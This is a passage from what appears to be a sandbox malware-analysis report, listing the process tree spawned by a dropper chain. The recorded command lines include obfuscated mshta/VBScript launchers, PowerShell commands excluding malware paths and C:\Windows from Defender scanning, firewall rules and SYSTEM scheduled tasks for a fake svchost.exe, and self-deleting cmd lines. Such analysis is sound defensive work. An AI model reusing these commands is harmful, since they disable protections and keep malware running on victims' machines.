        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\6dK_MfUBcpayi9j9YEVgwLOZ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\6dK_MfUBcpayi9j9YEVgwLOZ.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        9⤵
        
        PID:5604
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\6dK_MfUBcpayi9j9YEVgwLOZ.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\6dK_MfUBcpayi9j9YEVgwLOZ.exe" ) do taskkill -f -iM "%~NxM"
        10⤵
        
        PID:8000
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "6dK_MfUBcpayi9j9YEVgwLOZ.exe"
        11⤵
        Kills process with taskkill
        
        PID:3212
        
        C:\Users\Admin\Pictures\Adobe Films\7qhF7kw4VvVSZOEWE1OQMuHN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7qhF7kw4VvVSZOEWE1OQMuHN.exe"
        8⤵
        
        PID:6216
        
        C:\Users\Admin\Pictures\Adobe Films\7qhF7kw4VvVSZOEWE1OQMuHN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\7qhF7kw4VvVSZOEWE1OQMuHN.exe" -u
        9⤵
        
        PID:1684
        
        C:\Users\Admin\Pictures\Adobe Films\Rqs_aY9orcxi9KhxzHrtPQPi.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Rqs_aY9orcxi9KhxzHrtPQPi.exe"
        8⤵
        
        PID:6888
        
        C:\Users\Admin\Pictures\Adobe Films\BILsn2C8nMQUMmXTWDvs5Sfz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\BILsn2C8nMQUMmXTWDvs5Sfz.exe"
        8⤵
        
        PID:6920
        
        C:\Users\Admin\Pictures\Adobe Films\0PH4jbppUrFlMee2IM32BlMY.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0PH4jbppUrFlMee2IM32BlMY.exe"
        8⤵
        
        PID:7348
        
        C:\Users\Admin\Pictures\Adobe Films\2it_QCepzo6maZazPUW5iACL.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\2it_QCepzo6maZazPUW5iACL.exe"
        8⤵
        
        PID:7712
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        9⤵
        
        PID:4008
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
        10⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:4388
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ff88381dec0,0x7ff88381ded0,0x7ff88381dee0
        11⤵
        
        PID:7256
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7f3349e70,0x7ff7f3349e80,0x7ff7f3349e90
        12⤵
        
        PID:1252
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1532,17451606109537859638,8400986441066830300,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4388_2020108071" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1548 /prefetch:2
        11⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1532,17451606109537859638,8400986441066830300,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4388_2020108071" --mojo-platform-channel-handle=1764 /prefetch:8
        11⤵
        
        PID:7584
        
        C:\Users\Admin\Pictures\Adobe Films\EL2woh0MFjHKbQQypRDETezY.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EL2woh0MFjHKbQQypRDETezY.exe"
        8⤵
        
        PID:8096
        
        C:\Users\Admin\AppData\Local\Temp\is-BJB09.tmp\EL2woh0MFjHKbQQypRDETezY.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-BJB09.tmp\EL2woh0MFjHKbQQypRDETezY.tmp" /SL5="$20564,506127,422400,C:\Users\Admin\Pictures\Adobe Films\EL2woh0MFjHKbQQypRDETezY.exe"
        9⤵
        
        PID:8160
        
        C:\Users\Admin\AppData\Local\Temp\is-UJ4L5.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UJ4L5.tmp\DYbALA.exe" /S /UID=2709
        10⤵
        
        PID:848
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 772
        11⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5132
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5612
      - C:\Users\Admin\Pictures\Adobe Films\0xDmpgM19Vvke6Msy0FP1U67.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0xDmpgM19Vvke6Msy0FP1U67.exe"
        6⤵
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\c6cfccf3-8e43-45f8-912a-b5356004337c\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c6cfccf3-8e43-45f8-912a-b5356004337c\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\c6cfccf3-8e43-45f8-912a-b5356004337c\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        7⤵
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\c6cfccf3-8e43-45f8-912a-b5356004337c\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\c6cfccf3-8e43-45f8-912a-b5356004337c\AdvancedRun.exe" /SpecialRun 4101d8 1728
        8⤵
        
        PID:6156
        
        C:\Users\Admin\AppData\Local\Temp\92df5144-aa3d-4bbc-a5fa-aeea46b4ccab\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\92df5144-aa3d-4bbc-a5fa-aeea46b4ccab\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\92df5144-aa3d-4bbc-a5fa-aeea46b4ccab\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        7⤵
        
        PID:184
        
        C:\Users\Admin\AppData\Local\Temp\92df5144-aa3d-4bbc-a5fa-aeea46b4ccab\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\92df5144-aa3d-4bbc-a5fa-aeea46b4ccab\AdvancedRun.exe" /SpecialRun 4101d8 184
        8⤵
        
        PID:2472
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\0xDmpgM19Vvke6Msy0FP1U67.exe" -Force
        7⤵
        
        PID:6288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\0xDmpgM19Vvke6Msy0FP1U67.exe" -Force
        7⤵
        
        PID:3984
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\0xDmpgM19Vvke6Msy0FP1U67.exe" -Force
        7⤵
        
        PID:5432
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
        7⤵
        
        PID:5032
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
        7⤵
        
        PID:6908
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\0xDmpgM19Vvke6Msy0FP1U67.exe" -Force
        7⤵
        
        PID:6516
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe"
        7⤵
        
        PID:6400
        
        C:\Users\Admin\AppData\Local\Temp\546fec3d-6b68-4fdc-8d90-13e24ec9cf74\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\546fec3d-6b68-4fdc-8d90-13e24ec9cf74\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\546fec3d-6b68-4fdc-8d90-13e24ec9cf74\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        8⤵
        
        PID:7196
        
        C:\Users\Admin\AppData\Local\Temp\546fec3d-6b68-4fdc-8d90-13e24ec9cf74\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\546fec3d-6b68-4fdc-8d90-13e24ec9cf74\AdvancedRun.exe" /SpecialRun 4101d8 7196
        9⤵
        
        PID:6924
        
        C:\Users\Admin\AppData\Local\Temp\b8aad0fa-4508-4ba4-acbf-b8e12ec12323\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b8aad0fa-4508-4ba4-acbf-b8e12ec12323\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b8aad0fa-4508-4ba4-acbf-b8e12ec12323\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        8⤵
        
        PID:4572
        
        C:\Users\Admin\AppData\Local\Temp\b8aad0fa-4508-4ba4-acbf-b8e12ec12323\AdvancedRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b8aad0fa-4508-4ba4-acbf-b8e12ec12323\AdvancedRun.exe" /SpecialRun 4101d8 4572
        9⤵
        
        PID:7736
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
        8⤵
        
        PID:6376
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
        8⤵
        
        PID:5088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
        8⤵
        
        PID:6672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
        8⤵
        
        PID:7824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hepatocyte.exe" -Force
        8⤵
        
        PID:5672
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
        8⤵
        
        PID:6024
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"
        8⤵
        
        PID:7204
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        8⤵
        
        PID:7308
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
        8⤵
        
        PID:5920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
        7⤵
        
        PID:4968
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\0xDmpgM19Vvke6Msy0FP1U67.exe" -Force
        7⤵
        
        PID:7512
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Program Files\Common Files\System\sememe\svchost.exe" -Force
        7⤵
        
        PID:7412
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        7⤵
        
        PID:4760
      - C:\Users\Admin\Pictures\Adobe Films\xLwZCSXlSjJZMIZApdg2KuTN.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\xLwZCSXlSjJZMIZApdg2KuTN.exe"
        6⤵
        Executes dropped EXE
        
        PID:5136
      - C:\Users\Admin\Pictures\Adobe Films\EiNafRZwxXJHkk1J_eLA3PfR.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EiNafRZwxXJHkk1J_eLA3PfR.exe"
        6⤵
        
        PID:5440
      - C:\Users\Admin\Pictures\Adobe Films\lcSUHXGaDBTw_h3b1X42eKLp.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lcSUHXGaDBTw_h3b1X42eKLp.exe"
        6⤵
        
        PID:5684
      - C:\Users\Admin\Pictures\Adobe Films\QgozlsA6oTcjP7jYdXt3JLZm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\QgozlsA6oTcjP7jYdXt3JLZm.exe"
        6⤵
        
        PID:6036
      - C:\Users\Admin\Pictures\Adobe Films\RUw_MaFQxbHqwGyyynt9NE9r.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RUw_MaFQxbHqwGyyynt9NE9r.exe"
        6⤵
        
        PID:5412
        
        C:\Users\Admin\Pictures\Adobe Films\RUw_MaFQxbHqwGyyynt9NE9r.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RUw_MaFQxbHqwGyyynt9NE9r.exe"
        7⤵
        
        PID:5428
      - C:\Users\Admin\Pictures\Adobe Films\ajy159AdKE_3amy0NIRjQyK7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ajy159AdKE_3amy0NIRjQyK7.exe"
        6⤵
        
        PID:4216
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "ajy159AdKE_3amy0NIRjQyK7.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\ajy159AdKE_3amy0NIRjQyK7.exe" & exit
        7⤵
        
        PID:1476
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "ajy159AdKE_3amy0NIRjQyK7.exe" /f
        8⤵
        Kills process with taskkill
        
        PID:5140
      - C:\Users\Admin\Pictures\Adobe Films\lZsj_Xdk3wflk1256zj5afr_.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\lZsj_Xdk3wflk1256zj5afr_.exe"
        6⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\lZsj_Xdk3wflk1256zj5afr_.exe" & exit
        7⤵
        
        PID:4108
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:3648
      - C:\Users\Admin\Pictures\Adobe Films\0VvYtngW15SnaXequnCerWt0.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\0VvYtngW15SnaXequnCerWt0.exe"
        6⤵
        
        PID:2120
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        7⤵
        
        PID:4704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        7⤵
        
        PID:3612
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:6028
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
        7⤵
        
        PID:6416
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
        7⤵
        Creates scheduled task(s)
        
        PID:6440
        
        C:\Windows\System\svchost.exe
        
        "C:\Windows\System\svchost.exe" formal
        7⤵
        
        PID:7092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
        8⤵
        
        PID:6308
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
        8⤵
        
        PID:7832
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
        8⤵
        
        PID:7844
        
        C:\Windows\System32\netsh.exe
        
        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
        8⤵
        
        PID:696
      - C:\Users\Admin\Pictures\Adobe Films\EZfhMCVnEqYVv_aFueTp77Rw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\EZfhMCVnEqYVv_aFueTp77Rw.exe"
        6⤵
        
        PID:2432
      - C:\Users\Admin\Pictures\Adobe Films\MMtbSaT1oOC_2LzInqiro9HS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\MMtbSaT1oOC_2LzInqiro9HS.exe"
        6⤵
        
        PID:5780
      - C:\Users\Admin\Pictures\Adobe Films\9HbWmQQvTxj5AQiF0m_34_N7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\9HbWmQQvTxj5AQiF0m_34_N7.exe"
        6⤵
        
        PID:4720
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4720 -s 312
        7⤵
        Program crash
        
        PID:2792
      - C:\Users\Admin\Pictures\Adobe Films\ffSNDFP6N3W_U9Vb78OOJbhe.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\ffSNDFP6N3W_U9Vb78OOJbhe.exe"
        6⤵
        
        PID:4084
      - C:\Users\Admin\Pictures\Adobe Films\WncylidZ55fUJ3yo2vONfuWH.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\WncylidZ55fUJ3yo2vONfuWH.exe"
        6⤵
        
        PID:6044
        
        C:\Program Files (x86)\Company\NewProduct\cutm3.exe
        
        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
        7⤵
        
        PID:5728
      - C:\Users\Admin\Pictures\Adobe Films\xPNa37WZqc9ie5S_GAxKvj1L.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\xPNa37WZqc9ie5S_GAxKvj1L.exe"
        6⤵
        
        PID:4864
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\xPNa37WZqc9ie5S_GAxKvj1L.exe" & exit
        7⤵
        
        PID:4384
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:6632
      - C:\Users\Admin\Pictures\Adobe Films\qvDrcLYfwxWhuHMUgcIbmmFS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\qvDrcLYfwxWhuHMUgcIbmmFS.exe"
        6⤵
        
        PID:5204
      - C:\Users\Admin\Pictures\Adobe Films\M59zCZs1MocrTWHQ24erFQds.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\M59zCZs1MocrTWHQ24erFQds.exe"
        6⤵
        
        PID:4804
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4804 -s 872
        7⤵
        Program crash
        
        PID:3620
      - C:\Users\Admin\Pictures\Adobe Films\GbXQur6jd1qfBzLqAjFj3Xtb.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\GbXQur6jd1qfBzLqAjFj3Xtb.exe"
        6⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\cli.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cli.exe"
        7⤵
        
        PID:8108
      - C:\Users\Admin\Pictures\Adobe Films\Uc5AhpxX76q0b0gG3DOFCHGI.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Uc5AhpxX76q0b0gG3DOFCHGI.exe"
        6⤵
        
        PID:5004
      - C:\Users\Admin\Pictures\Adobe Films\RS0HCtXO6mRejRp2B61JauQW.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\RS0HCtXO6mRejRp2B61JauQW.exe"
        6⤵
        
        PID:3848
        
        C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
        
        C:\Users\Admin\AppData\Roaming\MegogoSell_crypted.exe
        7⤵
        
        PID:2924
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 576
        8⤵
        Program crash
        
        PID:5924
        
        C:\Users\Admin\AppData\Roaming\Underdress.exe
        
        C:\Users\Admin\AppData\Roaming\Underdress.exe
        7⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Unseduceability.exe"
        8⤵
        
        PID:6984
      - C:\Users\Admin\Pictures\Adobe Films\Ehq7FC_ipGoA09o70hz2o7LT.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Ehq7FC_ipGoA09o70hz2o7LT.exe"
        6⤵
        
        PID:4556
        
        C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
        7⤵
        
        PID:7000
        
        C:\Users\Admin\AppData\Local\7701013.exe
        
        "C:\Users\Admin\AppData\Local\7701013.exe"
        8⤵
        
        PID:6640
        
        C:\Users\Admin\AppData\Local\3099879.exe
        
        "C:\Users\Admin\AppData\Local\3099879.exe"
        8⤵
        
        PID:7224
        
        C:\Users\Admin\AppData\Local\5091156.exe
        
        "C:\Users\Admin\AppData\Local\5091156.exe"
        8⤵
        
        PID:7992
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbscRIpt: cLosE ( CreateOBjEct ( "WsCrIpT.shelL"). Run ( "cMD /q /c cOPy /Y ""C:\Users\Admin\AppData\Local\5091156.exe"" ..\RxAPuFNW.exe && sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i & IF """" == """" for %Z iN ( ""C:\Users\Admin\AppData\Local\5091156.exe"" ) do taskkill -f -Im ""%~NXZ"" ", 0, TRUE ))
        9⤵
        
        PID:6244
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /c cOPy /Y "C:\Users\Admin\AppData\Local\5091156.exe" ..\RxAPuFNW.exe &&sTaRT ..\rxAPuFNw.EXe -P1jBMdKQQ16j1dp4oT~i &IF "" == "" for %Z iN ( "C:\Users\Admin\AppData\Local\5091156.exe" ) do taskkill -f -Im "%~NXZ"
        10⤵
        
        PID:7560
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -Im "5091156.exe"
        11⤵
        Kills process with taskkill
        
        PID:5324
        
        C:\Users\Admin\AppData\Local\4013853.exe
        
        "C:\Users\Admin\AppData\Local\4013853.exe"
        8⤵
        
        PID:6176
        
        C:\Users\Admin\AppData\Local\8153484.exe
        
        "C:\Users\Admin\AppData\Local\8153484.exe"
        8⤵
        
        PID:6760
        
        C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WW1Soft.exe"
        7⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\liuchang-game.exe"
        7⤵
        
        PID:6524
        
        C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        7⤵
        
        PID:6500
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:7472
        
